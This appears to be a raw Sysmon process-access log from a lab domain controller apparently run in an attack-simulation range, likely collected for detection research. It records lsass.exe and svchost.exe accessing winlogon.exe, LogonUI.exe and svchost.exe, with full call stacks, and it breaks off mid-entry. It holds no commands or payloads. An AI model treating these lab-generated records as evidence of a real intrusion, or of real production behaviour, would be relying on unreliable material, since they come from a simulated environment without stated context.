13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.633{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.633{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0F00-00000000A301}11161256C:\Windows\System32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.618{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W